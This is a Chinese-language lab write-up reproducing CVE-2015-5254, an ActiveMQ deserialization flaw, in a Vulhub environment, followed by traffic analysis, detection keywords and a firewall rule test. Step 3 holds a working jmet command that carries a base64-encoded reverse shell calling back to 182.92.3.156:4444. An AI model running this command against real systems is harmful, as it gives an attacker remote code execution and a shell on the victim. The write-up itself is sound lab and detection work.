介绍
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。
Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
复现
1.Vulhub搭建好后对8161端口主页面进行访问
2.从github上下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。
https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
3.执行
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xODIuOTIuMy4xNTYvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.130.161 61616
调用java -jar 运行 jmet的jar包,-Q是插入一个名为event的队列,-I 是选择装载ActiveMQ模块 -s 是选择ysoserial payload -Y 是攻击模式和内容 -Yp 是选择攻击利用链,这是选择是ROME, 之后带上IP加端口。
4.模拟管理员访问/admin/browse.jsp?JMSDestination=event 登录
登录后会看到请求
5.nc进行监听
6.当管理员点击后,会执行命令
7.收到回话,反弹shell成功
特征分析
1.抓取数据包查看tcp流
2.java -jar 运行 jmet的jar包时像服务器发送数据
需要 -I 来指定装载ActiveMQ模块,所以tcp流中会有ActiveMQ关键字
3.jmet原理是使用ysoserial生成Payload并发送,所以会有ysoserial/payloads关键字。
下面是执行的反弹shell的命令
综上所述:CVE-2015-5254特征为tcp流数据中包括 ActiveMQ 和 ysoserial/payloads 关键字
规则测试
重新执行jmet
管理员这里并没有增加
防火墙成功拦截